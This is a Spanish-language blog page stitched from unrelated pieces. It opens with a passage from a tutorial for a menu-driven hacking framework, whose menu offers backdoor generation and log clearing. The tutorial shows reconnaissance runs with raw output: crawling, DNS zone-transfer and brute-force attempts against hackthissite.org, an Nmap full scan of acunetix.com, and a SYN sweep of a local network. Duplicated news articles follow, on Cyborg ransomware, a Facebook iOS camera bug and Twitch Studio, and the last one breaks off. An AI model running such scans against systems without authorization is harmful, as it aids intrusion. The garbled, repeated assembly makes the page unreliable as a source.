9XXb._       _.dXXXXb dXXXXbo.                 .odXXXXb dXXXXb._       _.dXXP
 9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo.           .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
  `9XXXXXXXXXXXXXXXXXXXXX'~   ~`OOO8b   d8OOO'~   ~`XXXXXXXXXXXXXXXXXXXXXP'
    `9XXXXXXXXXXXP' `9XX'   Hide    `98v8P'  Hack   `XXP' `9XXXXXXXXXXXP'
        ~~~~~~~       9X.          .db|db.          .XP       ~~~~~~~
                        )b.  .dbo.dP'`v'`9b.odb.  .dX
{0} Spider
 {1} Web technologie
 {2} WebApp Vul Scanner
 {3} Port Scanner
 {4} CMS Scanner
 {5} Fuzzers
 {6} Cms Exploit Scanner
 {7} Backdoor Generation
 {8} Linux Log Clear
 {9} Find MX/NS
 info>>> :
  • Ahora mostrará múltiples opciones, puedes usar cualquiera de ellas
  • Aquí estamos utilizando 0 spider
info>>> : 0
  ip For www.hackthissite.org :: "137.74.187.104"
 Links And Paths  ::
 Related domains and Parameters ::
 https://www.hackthissite.org
 irc://irc.hackthissite.org:+7000/
 https://www.hackthissite.org/forums
 https://www.cafepress.com/htsstore
 https://hts.io
 https://twitter.com/hackthissite
 /
 https://www.hackthissite.org/TNG355Q5B85cL3PDeI88H0dLCRYaA776flCTc4MX0u136lQ4hP94cZSnOFheqEU9zT8k6WDlcG17HglFDUi0Tg7kH42bzckCR4Q2ZQ
 https://www.hackthissite.org/advertise/
 /user/login
 /register
 /user/resetpass
 https://www.hackthissite.org/donate/
 /missions/basic/
 /missions/realistic/
 /missions/application/
 /missions/programming/
 /missions/phonephreaking/
 /missions/javascript/
 /missions/forensic/
 /missions/playit/extbasic/0/
 /missions/playit/stego/0/
 irc://irc.hackthissite.org/htb
 /blogs
 /news
 /pages/articles/article.php
 /lectures
 /pages/programs/programs.php
 http://mirror.hackthissite.org/hackthiszine/
  • Esta salida mostrará las páginas rastreadas del dominio objetivo. También mostró el inicio de sesión del usuario y el registro de las páginas del objetivo
  • Y luego estamos usando la opción (1) web technologie, esta opción escaneará el sitio web utilizando WhatWeb Information, Dig y también intentará la transferencia de zona y la fuerza bruta, el resultado de la ruta de rastreo y la detección de cortafuegos e IDS
info>>> : 1
  [+]Basic WhatWeb Information  ::
  terminated with exception (report_on_exception is true):
 Traceback (most recent call last):
         2542: from /usr/bin/whatweb:981:in block (2 levels) in <main>'         2541: from /usr/bin/whatweb:981:inloop'
         2540: from /usr/bin/whatweb:988:in block (3 levels) in <main>'         2539: from /usr/share/whatweb/lib/target.rb:96:inopen'
         2538: from /usr/share/whatweb/lib/target.rb:188:in open_url'         2537: from /usr/lib/ruby/2.5.0/net/http.rb:1455:inrequest'
         2536: from /usr/lib/ruby/2.5.0/net/http.rb:909:in start'         2535: from /usr/lib/ruby/2.5.0/net/http.rb:920:indo_start'
          … 2530 levels…
            4: from /usr/lib/ruby/2.5.0/resolv.rb:524:in block in fetch_resource'            3: from /usr/lib/ruby/2.5.0/resolv.rb:769:insender'
            2: from /usr/lib/ruby/2.5.0/resolv.rb:629:in allocate_request_id'            1: from /usr/lib/ruby/2.5.0/resolv.rb:629:insynchronize'
 /usr/lib/ruby/2.5.0/resolv.rb:630:in block in allocate_request_id': stack level too deep (SystemStackError) Traceback (most recent call last):         2542: from /usr/bin/whatweb:981:inblock (2 levels) in 
'
.-------------------------SNIP---------------------------------------------
         2541: from /usr/bin/whatweb:981:in loop'         2540: from /usr/bin/whatweb:988:inblock (3 levels) in '
         2539: from /usr/share/whatweb/lib/target.rb:96:in open'         2538: from /usr/share/whatweb/lib/target.rb:188:inopen_url'
         2537: from /usr/lib/ruby/2.5.0/net/http.rb:1455:in request'         2536: from /usr/lib/ruby/2.5.0/net/http.rb:909:instart'
         2535: from /usr/lib/ruby/2.5.0/net/http.rb:920:in do_start'          ... 2530 levels...            4: from /usr/lib/ruby/2.5.0/resolv.rb:524:inblock in fetch_resource'
            3: from /usr/lib/ruby/2.5.0/resolv.rb:769:in sender'            2: from /usr/lib/ruby/2.5.0/resolv.rb:629:inallocate_request_id'
            1: from /usr/lib/ruby/2.5.0/resolv.rb:629:in synchronize' /usr/lib/ruby/2.5.0/resolv.rb:630:inblock in allocate_request_id': stack level too deep (SystemStackError)
  [+]Host Result ::
 www.hackthissite.org has address 137.74.187.100
 www.hackthissite.org has address 137.74.187.103
 www.hackthissite.org has address 137.74.187.104
 www.hackthissite.org has address 137.74.187.102
 www.hackthissite.org has address 137.74.187.101
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:102
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:103
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:101
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:104
 www.hackthissite.org has IPv6 address 2001:41d0:8:ccd8:137:74:187:100
  [+]Dig Result About Dns::
 ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 7021 ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 ;8.8.8.8.                       IN      A ;; AUTHORITY SECTION: .                       6767    IN      SOA     a.root-servers.net. nstld.verisign-grs.com. 2019050800 1800 900 604800 86400 ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5506
 ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0
 ;www.hackthissite.org.          IN      A
 ;; ANSWER SECTION:
 www.hackthissite.org.   2440    IN      A       137.74.187.100
 www.hackthissite.org.   2440    IN      A       137.74.187.103
 www.hackthissite.org.   2440    IN      A       137.74.187.104
 www.hackthissite.org.   2440    IN      A       137.74.187.102
 www.hackthissite.org.   2440    IN      A       137.74.187.101
  [+]Trying zone transfer and Brute force ::
 Option w is ambiguous (wide, wordlist)
 Trying zone transfer first…
 Unsuccessful in zone transfer (it was worth a shot)
 Okay, trying the good old fashioned way… brute force
 Checking for wildcard DNS…
 Nope. Good.
 Now performing 2280 test(s)…
 Subnets found (may want to probe here using nmap or unicornscan):
 Done with Fierce scan: http://ha.ckers.org/fierce/
 Found 0 entries.
 Have a nice day.
  • Esta salida mostrará la información básica de un sitio web. Su escaneo detectó aplicaciones, servidores web y otras tecnologías. También escanea los encabezados HTTP del servidor web y el origen HTML de un destino.
  • Resultado del host: muestra la dirección IP del host del sitio web y también analiza IPv4 o IPv6 de un sitio web.
  • También escanea el Firewall y el IDS en el destino (No se detectó WAF por la detección genérica) significa NO WAF (Firewall de aplicación web).La herramienta Dig se usa para consultar servidores de nombres DNS, para obtener información como direcciones de host, servidor de correo, servidores de nombres e información relacionada. También se encuentran los registros A del objetivo
NOTA: PARA OBTENER TODAS LAS OPCIONES NO NECESITA DESPLAZARSE, SÓLO ESCRIBA BANNER Y SE MOSTRARÁN TODAS LAS OPCIONES
  • Y ahora usaremos la opción {3} Port Scanner, este escaneará puertos de destino completos utilizando dos herramientas: nmap y unicorn scan
Escaneo con Nmap
  • Elija cualquiera de ellos
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
  • Escriba 0
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
 [2] Nmap Os Scan
 [3] Nmap TCP Scan
 [4] Nmap UDB Scan
 [5] Nmap All scan
 [6] Nmap Http Option Scan
 [7] Nmap Live target In Network
 Scanner >>
  • Mostrará todas las opciones de Nmap
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>0
 [2] Nmap Os Scan
 [3] Nmap TCP Scan
 [4] Nmap UDB Scan
 [5] Nmap All scan
 [6] Nmap Http Option Scan
 [7] Nmap Live target In Network
 Scanner >>5
 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-09 05:59 EDT
 Nmap scan report for www.acunetix.com (54.208.84.166)
 Host is up (0.24s latency).
 rDNS record for 54.208.84.166: ec2-54-208-84-166.compute-1.amazonaws.com
 Not shown: 998 filtered ports
 PORT    STATE SERVICE  VERSION
 80/tcp  open  http     nginx
 |http-server-header: acunetix.com |_http-title: Did not follow redirect to https://acunetix.com/ 443/tcp open  ssl/http nginx | http-robots.txt: 3 disallowed entries |/dontVisitMe/ /blog/worldsecuritynews/* /
 |_http-server-header: acunetix.com
 |_http-title: 400 The plain HTTP request was sent to HTTPS port
 | ssl-cert: Subject: commonName=.acunetix.com/organizationName=Acunetix Ltd/stateOrProvinceName=ST. JULIANS/countryName=MT | Subject Alternative Name: DNS:.acunetix.com, DNS:acunetix.com
 | Not valid before: 2018-10-24T00:00:00
 |_Not valid after:  2020-11-18T12:00:00
 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 Device type: media device|specialized|general purpose
 Running: Crestron embedded, Wago Kontakttechnik embedded, Linux 2.4.X
 OS CPE: cpe:/h:crestron:mpc-m5 cpe:/h:wago_kontakttechnik:750-852 cpe:/o:linux:linux_kernel:2.4.26
 OS details: Crestron MPC-M5 AV controller or Wago Kontakttechnik 750-852 PLC, Linux 2.4.26 (Slackware 10.0.0)
 TRACEROUTE (using port 80/tcp)
 HOP RTT     ADDRESS
 1   …
 2   4.06 ms 115.97.136.1
 3   … 30
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 58.15 seconds
  • Nmap TCP Scan muestra los puertos abiertos y cerrados de TCP. Este es uno de los temas más relevantes del curso de hacking ético del IICS
Escaneo de Unicorn
  • Ahora analizaremos la herramienta Unicorn. Debe seguir todos los pasos para obtener la opción de escaneo de puertos y luego seleccionar 1
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>
  • Se mostrarán los tipos de escaneados disponibles
  • Deje que seleccione [9] TCP SYN Scan en una red completa y le pedirá una dirección IP 192.168.1.1 del enrutador
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>9
 Your Router Ip : 192.168.1.1
  • Deje que el escaneo continúe
            _        _____  /        | |      / ____| /    _   _| |_ ___| (___   ___ __ _ _ __  _ __   ___ _ __
 / / | | | | / _ _  / / ` | ' | '_  / _  '|
   / _  || | || () |) | (| (| | | | | | | |  / |  //    ,|// ,|| ||| ||__|_|
 [0] Nmap Scan
 [1] Unicorn Scan
 Scanner >>1
 [8] Services OS
 [9] TCP SYN Scan on a whole network
 [01] UDP scan on the whole network
 Scanner >>9
 Your Router Ip : 192.168.1.1
 adding 192.168.1.0/24 mode TCPscan' ports7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,79-81,88,98,100,105-107,109-111,113,118,119,123,129,135,137-139,143,150,161-164,174,177-179,191,199-202,204,206,209,210,213,220,345,346,347,369-372,389,406,407,422,443-445,487,500,512-514,517,518,520,525,533,538,548,554,563,587,610-612,631-634,636,642,653,655,657,666,706,750-752,765,779,808,873,901,923,941,946,992-995,1001,1023-1030,1080,1210,1214,1234,1241,1334,1349,1352,1423-1425,1433,1434,1524,1525,1645,1646,1649,1701,1718,1719,1720,1723,1755,1812,1813,2048-2050,2101-2104,2140,2150,2233,2323,2345,2401,2430,2431,2432,2433,2583,2628,2776,2777,2988,2989,3050,3130,3150,3232,3306,3389,3456,3493,3542-3545,3632,3690,3801,4000,4400,4321,4567,4899,5002,5136-5139,5150,5151,5222,5269,5308,5354,5355,5422-5425,5432,5503,5555,5556,5678,6000-6007,6346,6347,6543,6544,6789,6838,6666-6670,7000-7009,7028,7100,7983,8079-8082,8088,8787,8879,9090,9101-9103,9325,9359,10000,10026,10027,10067,10080,10081,10167,10498,11201,15345,17001-17003,18753,20011,20012,21554,22273,26274,27374,27444,27573,31335-31338,31787,31789,31790,31791,32668,32767-32780,33390,47262,49301,54320,54321,57341,58008,58009,58666,59211,60000,60006,61000,61348,61466,61603,63485,63808,63809,64429,65000,65506,65530-65535' pps 300
 using interface(s) eth0
----------------------------------SNIP-------------------------------------
 scaning 2.56e+02 total hosts with 8.65e+04 total packets, should take a little longer than 4 Minutes, 55 Seconds
 connected 192.168.1.12:34682 -> 192.168.1.10:139
 TCP open 192.168.1.10:139  ttl 128
 connected 192.168.1.12:19928 -> 192.168.1.5:139
 TCP open 192.168.1.5:139  ttl 128
 connected 192.168.1.12:57128 -> 192.168.1.3:139
 TCP open 192.168.1.3:139  ttl 128
 connected 192.168.1.12:40890 -> 192.168.1.4:139
 TCP open 192.168.1.4:139  ttl 128
 connected 192.168.1.12:63984 -> 192.168.1.3:3389
 TCP open 192.168.1.3:3389  ttl 128
 connected 192.168.1.12:4474 -> 192.168.1.1:23
 TCP open 192.168.1.1:23  ttl 64
 connected 192.168.1.12:19804 -> 192.168.1.5:445
 TCP open 192.168.1.5:445  ttl 128
 connected 192.168.1.12:17218 -> 192.168.1.10:445
 TCP open 192.168.1.10:445  ttl 128
 connected 192.168.1.12:16075 -> 192.168.1.4:445
 TCP open 192.168.1.4:445  ttl 128
 connected 192.168.1.12:35635 -> 192.168.1.3:445
 TCP open 192.168.1.3:445  ttl 128
 connected 192.168.1.12:59512 -> 192.168.1.1:53
 TCP open 192.168.1.1:53  ttl 64
 connected 192.168.1.12:17273 -> 192.168.1.1:80
 TCP open 192.168.1.1:80  ttl 64
 connected 192.168.1.12:17994 -> 192.168.1.3:554
 TCP open 192.168.1.3:554  ttl 128
 connected 192.168.1.12:10098 -> 192.168.1.4:554
 TCP open 192.168.1.4:554  ttl 128
 connected 192.168.1.12:5254 -> 192.168.1.10:135
 TCP open 192.168.1.10:135  ttl 128
 connected 192.168.1.12:10011 -> 192.168.1.3:135
 TCP open 192.168.1.3:135  ttl 128
 connected 192.168.1.12:19956 -> 192.168.1.4:135
 TCP open 192.168.1.4:135  ttl 128
 connected 192.168.1.12:21180 -> 192.168.1.5:135
 TCP open 192.168.1.5:135  ttl 128
 connected 192.168.1.12:14926 -> 192.168.1.1:443
 TCP open 192.168.1.1:443  ttl 64
 connected 192.168.1.12:17101 -> 192.168.1.10:443
 TCP open 192.168.1.10:443  ttl 128
 connected 192.168.1.12:6074 -> 192.168.1.3:443
 TCP open 192.168.1.3:443  ttl 128
 connected 192.168.1.12:51922 -> 192.168.1.4:443
 TCP open 192.168.1.4:443  ttl 128
 connected 192.168.1.12:13164 -> 192.168.1.6:22
 TCP open 192.168.1.6:22  ttl 64
 sender statistics 177.8 pps with 86528 packets sent total
 listener statistics 2894 packets recieved 0 packets droped and 0 interface drops
 TCP open                  telnet[   23]         from 192.168.1.1  ttl 64
 TCP open                  domain[   53]         from 192.168.1.1  ttl 64
 TCP open                    http[   80]         from 192.168.1.1  ttl 64
 TCP open                   https[  443]         from 192.168.1.1  ttl 64
 TCP open                   epmap[  135]         from 192.168.1.3  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.3  ttl 128
 TCP open                   https[  443]         from 192.168.1.3  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.3  ttl 128
 TCP open                    rtsp[  554]         from 192.168.1.3  ttl 128
 TCP open           ms-wbt-server[ 3389]         from 192.168.1.3  ttl 128
 TCP open                   epmap[  135]         from 192.168.1.4  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.4  ttl 128
 TCP open                   https[  443]         from 192.168.1.4  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.4  ttl 128
 TCP open                    rtsp[  554]         from 192.168.1.4  ttl 128
 TCP open                   epmap[  135]         from 192.168.1.5  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.5  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.5  ttl 128
 TCP open                     ssh[   22]         from 192.168.1.6  ttl 64
 TCP open                   epmap[  135]         from 192.168.1.10  ttl 128
 TCP open             netbios-ssn[  139]         from 192.168.1.10  ttl 128
 TCP open                   https[  443]         from 192.168.1.10  ttl 128
 TCP open            microsoft-ds[  445]         from 192.168.1.10  ttl 128
  • Se escanearán todos los puertos TCP abiertos en el objetivo
connected 192.168.1.12:34682 -> 192.168.1.10:139
 TCP open 192.168.1.10:139  ttl 128
  • También escanean los puertos TCP abiertos y muestra los servicios con puertos
  • Estadísticas del remitente 177.8 pps con 86528 paquetes enviados en total
  • Para escanear utiliza su tarjeta de red local como se muestra a continuación
using interface(s) eth0

viernes, 22 de noviembre de 2019


Cuidado con las actualizaciones fake de Windows, pueden infectar tu PC

El ransomware continúa siendo una amenaza en España, estos son los 5 más peligrosos
Se ha descubierto una actualización falsa para Windows 10 que puede infectar tu ordenador con ransomware cifrando todos tus archivos para que no puedas volver a utilizar el equipo.
Uno de los ataques más peligrosos que podremos sufrir en nuestro ordenador es el llamado ransomware, que es cuando se cifran todos nuestros archivos y no podemos acceder a los mismos al no ser que paguemos una recompensa. Este tipo de vulnerabilidades que se encuentran bastante común en Internet suelen estar dirigidas a empresas, aunque de momento siguen teniendo como objetivo a los usuarios.
La firma de seguridad Trustwave ha descubierto una nueva campaña de ransomware que se basa en el miedo y advertencias falsas sobre una infección en tu sistema operativo. Estos avisos que meten miedo al usuario son enviados al correo electrónico de la víctima donde se incluye adjuntada la amenaza. En este correo se insta al usuario a que ejecute una actualización falsa y que viene mediante una extensión JPG, pero que en realidad esconde el ransomware cyborg.
Ransomware Cyborg
Una vez que el ransomware infecta nuestro ordenador, los archivos se cifran y cambian a la extensión “777”. Desde ese momento los archivos del usuario están totalmente bloqueados, y sólo tienes acceso a un documento de texto en el escritorio donde se te proporcionan instrucciones para volver a contar con acceso a los archivos.
En dicho documento de texto se pide al usuario que envíe 500 $ a una billetera de Bitcoin para que se desbloqueen sus archivos, en un procedimiento en el que caen muy pocas personas. Si pagas los 500 $ de recompensa, no solo vas a perder el dinero, sino también tus archivos  dado que jamás recibirás la clave para que vuelvas a tener acceso a los mismos.
Si estás infectado por el ransomware no podrás hacer absolutamente nada y la mejor solución es formatear el equipo. Es por ello que siempre es bueno contar con copias de seguridad de nuestro ordenador, o al menos guardar todos los archivos o documentos importantes en un disco duro externo.
Es totalmente aconsejable que jamás abras un archivo adjunto que te venga desde un correo electrónico desconocido. No obstante, ninguna compañía de este calibre se pondrá en contacto contigo a través del correo, con lo que debes evitar abrir este tipo de mensajes.

Cuidado con las actualizaciones fake de Windows, pueden infectar tu PC


Cuidado con las actualizaciones fake de Windows, pueden infectar tu PC

El ransomware continúa siendo una amenaza en España, estos son los 5 más peligrosos
Se ha descubierto una actualización falsa para Windows 10 que puede infectar tu ordenador con ransomware cifrando todos tus archivos para que no puedas volver a utilizar el equipo.
Uno de los ataques más peligrosos que podremos sufrir en nuestro ordenador es el llamado ransomware, que es cuando se cifran todos nuestros archivos y no podemos acceder a los mismos al no ser que paguemos una recompensa. Este tipo de vulnerabilidades que se encuentran bastante común en Internet suelen estar dirigidas a empresas, aunque de momento siguen teniendo como objetivo a los usuarios.
La firma de seguridad Trustwave ha descubierto una nueva campaña de ransomware que se basa en el miedo y advertencias falsas sobre una infección en tu sistema operativo. Estos avisos que meten miedo al usuario son enviados al correo electrónico de la víctima donde se incluye adjuntada la amenaza. En este correo se insta al usuario a que ejecute una actualización falsa y que viene mediante una extensión JPG, pero que en realidad esconde el ransomware cyborg.
Ransomware Cyborg
Una vez que el ransomware infecta nuestro ordenador, los archivos se cifran y cambian a la extensión “777”. Desde ese momento los archivos del usuario están totalmente bloqueados, y sólo tienes acceso a un documento de texto en el escritorio donde se te proporcionan instrucciones para volver a contar con acceso a los archivos.
En dicho documento de texto se pide al usuario que envíe 500 $ a una billetera de Bitcoin para que se desbloqueen sus archivos, en un procedimiento en el que caen muy pocas personas. Si pagas los 500 $ de recompensa, no solo vas a perder el dinero, sino también tus archivos  dado que jamás recibirás la clave para que vuelvas a tener acceso a los mismos.
Si estás infectado por el ransomware no podrás hacer absolutamente nada y la mejor solución es formatear el equipo. Es por ello que siempre es bueno contar con copias de seguridad de nuestro ordenador, o al menos guardar todos los archivos o documentos importantes en un disco duro externo.
Es totalmente aconsejable que jamás abras un archivo adjunto que te venga desde un correo electrónico desconocido. No obstante, ninguna compañía de este calibre se pondrá en contacto contigo a través del correo, con lo que debes evitar abrir este tipo de mensajes.

jueves, 14 de noviembre de 2019

[Actualizado] Facebook para iOS accede a la cámara de algunos usuarios sin que lo sepan, pero probablemente se trata de un bug

[Actualizado] Facebook para iOS accede a la cámara de algunos usuarios sin que lo sepan, pero probablemente se trata de un bug

Facebook se ha puesto en contacto con nostros con el siguiente mensaje, confirmando que se trataba de un bug que ya han solucionado: "Recientemente descubrimos que la versión 244 de la aplicación de Facebook iOS se iniciaba incorrectamente en modo horizontal. Al arreglar ese problema la semana pasada en la versión 246 (lanzada el 8 de noviembre), sin darnos cuenta introdujimos un error que causó que la aplicación navegara parcialmente a la pantalla de la cámara adyacente a News Feed cuando los usuarios tocaban las fotos. No hemos visto ninguna evidencia de que se hayan subido fotos o vídeos debido a este error. Enviaremos el parche a Apple hoy".
Facebook es una de las firmas que más suspicacias despiertan entre los usuarios cuando hay que hablar de privacidad. Es algo que puede ser bastante lógico si atendemos a los antecedentes recientes de la plataforma, repetidos una y otra vez, y por eso noticias como esta siempre llaman la atención.
Según leemos en The Next Web, la aplicación por medio de la cual accedemos a la famosa red social, podría estar dando acceso a la cámara de los teléfonos iPhone sin que el usuario tuviera conocimiento de que algo así está sucediendo.

Cámara en segundo plano

Facebook
Hay que tomar la noticia con cuidado, puesto que se trata de información surgida a causa de lo que ha experimentado un usuario, Joshua Maddux, que ha manifestado en Twitter que su teléfono, un iPhone, muestra un comportamiento anormal cuando hace uso de la app de Facebook que se puede encontrar en la App Store.
Según este usuario, la aplicación de Facebook ofrece acceso a la cámara del iPhone mientras se desplaza por su muro de noticias. Se puede apreciar en el vídeo como en el margen izquierdo de la pantalla se ve la grabación efectuada por la cámara.
En el tweet que ha publicado, se puede apreciar cómo al mover una foto presente en el timeline de Facebook, en segundo plano se muestra a toda pantalla la grabación que está efectuando la cámara trasera de su smartphone.
Maddux afirma que ha logrado reproducir el mismo bug en hasta cinco dispositivos, todos iPhone, los cuales contaban con la versión de firmware más reciente (a excepción de la beta). Todos hacían uso de iOS 13.2.2, mientras que los modelos que ejecutan iOS 12 no muestran este fallo.

Facebook tras el escándalo: así ha cambiado la empresa un año después del desastre de Cambridge Analytica
No es el único caso en el que usuarios de Facebook muestran su descontento con la app de iOS y este fallo. Es el caso de Daryl Lasafin que en Twitter muestra el mismo fallo. La cámara trabajando de fondo y de nuevo con iOS 13.2.2.
En todos los casos en los que se da esta situación, la app de Facebook para iOS cuenta con acceso a la cámara, algo que me hizo probar la app en un iPhone para ver si conseguía reproducir el fallo.
Facebook Ios
He usado un iPhone 11 Pro con iOS 13.3 (es la beta) y me cerciorado de que Facebook cuenta con acceso a la función cámara y en ningún momento he notado que bajo la app, la cámara trasera esté funcionando en segundo plano.
No está claro qué es lo que motiva el error, si se trata de un fallo o bug, por lo que esperamos alguna información oficial por parte de Facebook pronunciándose sobre este hecho. Si es un fallo, debería corregirse con la siguiente actualización de la aplicación en iOS.

[Actualizado] Facebook para iOS accede a la cámara de algunos usuarios sin que lo sepan, pero probablemente se trata de un bug

[Actualizado] Facebook para iOS accede a la cámara de algunos usuarios sin que lo sepan, pero probablemente se trata de un bug

[Actualizado] Facebook para iOS accede a la cámara de algunos usuarios sin que lo sepan, pero probablemente se trata de un bug

Facebook se ha puesto en contacto con nostros con el siguiente mensaje, confirmando que se trataba de un bug que ya han solucionado: "Recientemente descubrimos que la versión 244 de la aplicación de Facebook iOS se iniciaba incorrectamente en modo horizontal. Al arreglar ese problema la semana pasada en la versión 246 (lanzada el 8 de noviembre), sin darnos cuenta introdujimos un error que causó que la aplicación navegara parcialmente a la pantalla de la cámara adyacente a News Feed cuando los usuarios tocaban las fotos. No hemos visto ninguna evidencia de que se hayan subido fotos o vídeos debido a este error. Enviaremos el parche a Apple hoy".
Facebook es una de las firmas que más suspicacias despiertan entre los usuarios cuando hay que hablar de privacidad. Es algo que puede ser bastante lógico si atendemos a los antecedentes recientes de la plataforma, repetidos una y otra vez, y por eso noticias como esta siempre llaman la atención.
Según leemos en The Next Web, la aplicación por medio de la cual accedemos a la famosa red social, podría estar dando acceso a la cámara de los teléfonos iPhone sin que el usuario tuviera conocimiento de que algo así está sucediendo.

Cámara en segundo plano

Facebook
Hay que tomar la noticia con cuidado, puesto que se trata de información surgida a causa de lo que ha experimentado un usuario, Joshua Maddux, que ha manifestado en Twitter que su teléfono, un iPhone, muestra un comportamiento anormal cuando hace uso de la app de Facebook que se puede encontrar en la App Store.
Según este usuario, la aplicación de Facebook ofrece acceso a la cámara del iPhone mientras se desplaza por su muro de noticias. Se puede apreciar en el vídeo como en el margen izquierdo de la pantalla se ve la grabación efectuada por la cámara.
En el tweet que ha publicado, se puede apreciar cómo al mover una foto presente en el timeline de Facebook, en segundo plano se muestra a toda pantalla la grabación que está efectuando la cámara trasera de su smartphone.
Maddux afirma que ha logrado reproducir el mismo bug en hasta cinco dispositivos, todos iPhone, los cuales contaban con la versión de firmware más reciente (a excepción de la beta). Todos hacían uso de iOS 13.2.2, mientras que los modelos que ejecutan iOS 12 no muestran este fallo.

Facebook tras el escándalo: así ha cambiado la empresa un año después del desastre de Cambridge Analytica
No es el único caso en el que usuarios de Facebook muestran su descontento con la app de iOS y este fallo. Es el caso de Daryl Lasafin que en Twitter muestra el mismo fallo. La cámara trabajando de fondo y de nuevo con iOS 13.2.2.
En todos los casos en los que se da esta situación, la app de Facebook para iOS cuenta con acceso a la cámara, algo que me hizo probar la app en un iPhone para ver si conseguía reproducir el fallo.
Facebook Ios
He usado un iPhone 11 Pro con iOS 13.3 (es la beta) y me cerciorado de que Facebook cuenta con acceso a la función cámara y en ningún momento he notado que bajo la app, la cámara trasera esté funcionando en segundo plano.
No está claro qué es lo que motiva el error, si se trata de un fallo o bug, por lo que esperamos alguna información oficial por parte de Facebook pronunciándose sobre este hecho. Si es un fallo, debería corregirse con la siguiente actualización de la aplicación en iOS.

Ya está disponible Twitch Studio: una app que simplifica el proceso de dar vida a un streaming

Ya está disponible Twitch Studio: una app que simplifica el proceso de dar vida a un streaming

Hace unos años era toda una odisea iniciar un streaming desde tu computadora para mostrar tus partidas. Lo era tanto por la velocidad de las conexiones como por la cantidad de florituras que había que hacer en cuanto a software.
Hoy es mucho más sencillo, y Twitch (plataforma estrella para ver o crear streamings relacionados con videojuegos) ha lanzado una herramienta con la que buscan simplificar aún más el proceso.

Disponible "de momento" para Windows

Se trata de Twitch Studio, una aplicación que acaban de lanzar en beta pública, lo que significa que todo el mundo ya puede probarla. Esta herramienta está enfocada, sobre todo, para los recién llegados.
Twitch lanzó esta aplicación en beta cerrada hace unos meses y, tras las pruebas de un grupo de usuarios elegidos, por fin está disponible para que todos podamos probarla.

Cómo activar el nuevo contador de FPS en la barra de juego de Windows 10
Eso significa que una vez que la instalemos nos irán llevando a través de una serie de pasos sencillos, para ajustar todos los parámetros y que el resultado (tanto de vídeo como de audio) parezca lo más profesional posible.
Imagen 13 11 19 9 49 Pegada
Twitch Studio se encargará de detectar automáticamente la webcam, el micrófono o la resolución de tu pantalla y ajustará todos los parámetros para sacar el mejor partido. Además, será posible personalizar el aspecto de nuestro streaming para darle mayor identidad a nuestro canal.
Imagen 13 11 19 9 18 Pegada
También cuenta con alertas integradas, lo que facilita a los que están llevando a cabo el streaming la monitorización y la interacción con los espectadores mediante el chat.
Hay que matizar que, de momento, Twitch Studio sólo está disponible para Windows (Windows 7 o superior). La compañía ha puntualizado ese "de momento", lo que significa que es probable que veamos llegar una versión para macOS, iOS o Android.

Ya está disponible Twitch Studio: una app que simplifica el proceso de dar vida a un streaming

Ya está disponible Twitch Studio: una app que simplifica el proceso de dar vida a un streaming

Ya está disponible Twitch Studio: una app que simplifica el proceso de dar vida a un streaming

Hace unos años era toda una odisea iniciar un streaming desde tu computadora para mostrar tus partidas. Lo era tanto por la velocidad de las conexiones como por la cantidad de florituras que había que hacer en cuanto a software.
Hoy es mucho más sencillo, y Twitch (plataforma estrella para ver o crear streamings relacionados con videojuegos) ha lanzado una herramienta con la que buscan simplificar aún más el proceso.

Disponible "de momento" para Windows

Se trata de Twitch Studio, una aplicación que acaban de lanzar en beta pública, lo que significa que todo el mundo ya puede probarla. Esta herramienta está enfocada, sobre todo, para los recién llegados.
